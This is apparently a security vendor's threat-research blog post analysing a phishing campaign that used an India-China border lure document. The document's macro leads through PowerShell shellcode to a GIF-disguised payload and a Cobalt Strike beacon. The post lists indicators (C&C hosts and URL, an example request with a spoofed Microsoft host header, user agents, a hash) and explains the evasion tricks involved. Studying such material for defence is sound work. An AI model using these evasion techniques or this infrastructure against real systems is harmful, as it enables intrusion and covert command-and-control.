Protect and empower your business by leveraging the platform, process and people skills to accelerate your zero trust initiatives
Protect and empower your business by leveraging the platform, process and people skills to accelerate your zero trust initiatives
Protect and empower your business by leveraging the platform, process and people skills to accelerate your zero trust initiatives
Zscaler: The Only Leader in the 2020 Gartner Magic Quadrant for Secure Web Gateways
Secure work from anywhere, protect data, and deliver the best experience possible for users
Ransomware is the biggest threat to digital business.
Learn how to take a proactive, zero trust approach to safeguarding your enterprise
Your network security is costing more than it’s worth.
See how five companies drove simplicity, savings and security
It’s time to protect your ServiceNow data better and respond to security incidents quicker
Dive into the latest security research and best practices
Dive into the latest security research and best practices
Dive into the latest security research and best practices
Join a recognized leader in Zero trust to help organization transform securely
Join a recognized leader in Zero trust to help organization transform securely
Join a recognized leader in Zero trust to help organization transform securely
Malicious threat actors are always ready to take advantage of current affairs to maximize the success rate of their attacks.
The Zscaler ThreatLabZ team recently came across one such attack trying to leverage the current India-China border dispute to lure victims to open an attached malicious document.
It appears as if victims were sent a malicious lure document as an email attachment.
The document is named “India-China border tensions.doc” and contains an article by The Times of India article about the same topic.
Figure 1: The infection flow of this attack.
The document contains one line that reads “Geostrategic article for SE Asia Security Analyst,” indicating that the target might be a security analyst for southeast Asia.
Figure 2: The malicious document containing a new article reference.
Interestingly, the document contained corrupted macro code leading us to believe that it was built in a hurry using some automated macro obfuscation tool without proper testing.
Though the macro is corrupt, we were able to extract the PowerShell command using static analysis.
The code obfuscation is very basic.
It just subtracts value 4 to decrypt the PowerShell command.
Figure 3: The macro command decryption function.
Part of the PowerShell command after the base64 decoding looks like this:
Figure 4: Part of the PowerShell code designed to run shellcode.
Almost exact code from the DKMC framework is used to run embedded base64 encoded shellcode.
The PowerShell script is designed to run the shellcode in 32-bit mode only.
It checks if the PowerShell script is running with a 64-bit PowerShell process using the command int pointer size, which will be 8 bytes [64bits] on a 64-bit process.
If that is the case, then it tries to run the PowerShell in 32-bit mode with the shellcode injection script code as an argument.
This shellcode on execution downloads another shellcode but with a valid GIF header, again borrowing a technique from DKMC.
Interestingly, this shellcode uses a fake HTML host header and a predefined User-Agent field, in this case, to download a GIF payload from the C&C IP over HTTPS.
Figure 5: The shellcode starting with well-known module list access instructions.
Request example:GET /avatar_32px.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: update.windows.microsoft.comConnection: Keep-AliveCache-Control: no-cache
This GIF file, just after the GIF magic bytes [“GIF89a” in this case, which is also a valid assembly instruction] contains a shellcode followed by an XOR-encrypted payload.
The shellcode decrypts and executes this payload, which turns out to be a Cobalt Strike beacon.
Figure 6: The shellcode and payload before decryption.
Figure 7: The shellcode and payload after decryption.
The beacon is configured to point to the following C&C address “userimage8.360doc.com,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books”  and the same host field and user agent.
In another instance, we found a .NET payload, which injects an RSA-encrypted payload into a notepad.exe file after decryption with the MD5: 9c2ee383d235a702c5ad70b1444efb4d
In this case, the beacon payload is downloaded from https://114.67.110[.]37/QBah.
The shellcode and additional payload are similar except for the C&C addresses.
Noticeably, both beacon DLLs use a 360doc.com-based C&C, and the watermark is exactly the same in both: 305419896.
As Cobalt Strike is a well-known commercial tool for red teams, we are not getting into its technical details.
As of now, we are not able to attribute this attack to a specific actor with enough confidence.
But here are few observations.
The group OceanLotus is known to use DKMC, Cobalt Strike, and fileless payloads.
But the use of a proper GIF header for shellcode seems to be new for them.
On the other hand, the watermark value (305419896) found in the beacon configuration has also been used by the Trickbot Group.
Figure 8: The Zscaler Cloud Sandbox report for this malware.
Note: The document will crash in this case but if fixed to run, the Zscaler Cloud Sandbox will block its activity.
In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels.
Check out our Threat Library for more details about Win32.Backdoor.CobaltStrike.
Threat actors always try to find ways to blend into real traffic.
they are using an SSL/TLS connection and a host header set to a legitimate Microsoft website.
One such evasion trick that we covered in our earlier blog was the use of FakeTLS header.
The Zscaler ThreatLabZ team is continuously monitoring threat actors and ensuring protection against such threats.
AcknowledgmentThanks to Adtiya Sharma for providing support in the research.
Document is delivered as an email attachment
Uses PowerShell to run shellcode
Uses doc attachment requiring user interaction
Uses fake GIF header magic bytes and filename
Uses more than one C&C
Note: The TTP list above contains TTP observed during the campaign as a Cobalt Strike beacon has many more features.
A complete list of techniques can be found here.
    "UserAgent": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "UserAgent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko",
